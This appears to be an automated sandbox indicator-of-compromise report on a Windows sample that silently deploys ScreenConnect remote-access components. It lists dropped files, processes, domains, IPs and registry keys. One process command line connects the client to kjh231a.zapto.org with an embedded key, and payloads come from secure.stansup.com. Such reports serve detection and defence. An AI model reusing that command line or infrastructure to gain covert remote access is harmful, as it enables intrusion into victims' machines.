IOC Report
3coxOaV92n.exe

loading gif

Files

File Path
Type
Category
Malicious
3coxOaV92n.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
 malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3coxOaV92n.exe_13c990b719c88e7e398da3cbdb8fa19db9e9438_1be62bd4_4fcf22e5-136c-4a5c-bcb6-45c782844a7b\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x5da598e5, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FB7.tmp.dmp
Mini DuMP crash report, 14 streams, Fri Oct 25 17:29:16 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER50C2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5101.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER510F.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER516E.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\fy1ftoo0.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76GEJ2UX.log
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\1A8JLAL6.KO1\RZBMYN0L.REL.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
modified
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\System32\user.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 70 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\3coxOaV92n.exe
"C:\Users\user\Desktop\3coxOaV92n.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
malicious
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2001
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnec
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application?
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationft
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application9
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationH
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.confign
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exeC
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://secure.staPB
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
79.110.49.185
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
unknown
https://secure.stansup.com
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application1
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
unknown
http://Passport.NET/STS</ds:KeyName></ds:KeyInfo><Ciph
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
https://account.live.
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationh
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationP
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdnc#
unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application34e089
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.stansup.com/Bin/ScreenConnect.C
unknown
http://Passport.NET/tb_
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationKy
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
79.110.49.185
https://account.live.com/msangcwam
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
79.110.49.185
http://www.w3.or
unknown
http://crl.ver)
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
unknown
http://passport.net/tb
unknown
https://secure.staP
unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationx
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds/www
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
unknown
https://secure.staPx
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windo
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
79.110.49.185
https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuer
unknown
http://schemas.xmlsoap.org/ws/2005/02/scR
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
unknown
http://schemas.xmlsoap.org/ws/2005/02/trustm
unknown
https://secure.stansup.com/Bn
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.Window
unknown
http://schemas.xmlsoap.org/ws/2005/02/scicy
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll
79.110.49.185
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe0
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust
unknown
https://login.microsoftonline.com/MSARST2.srf
unknown
http://Passport.NET/STS
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xml
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll#
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicat
unknown
http://www.w3.o
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
79.110.49.185
https://account.live.co
unknown
http://Passport.NET/tb
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
79.110.49.185
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
unknown
https://signup.live.com/signup.aspx
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
79.110.49.185
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdOAPF
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
unknown
https://login.microsoftonline.com/MSARST2.srfH
unknown
http://schemas.xmlsoap.org/ws/2004/09/policy
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application899
unknown
https://secure.stansup.com/Bin/ScreenConnect.Core.dll
79.110.49.185
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.210.172
secure.stansup.com
79.110.49.185
kjh231a.zapto.org
79.110.49.185
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.18
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
79.110.49.185
secure.stansup.com
Germany

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
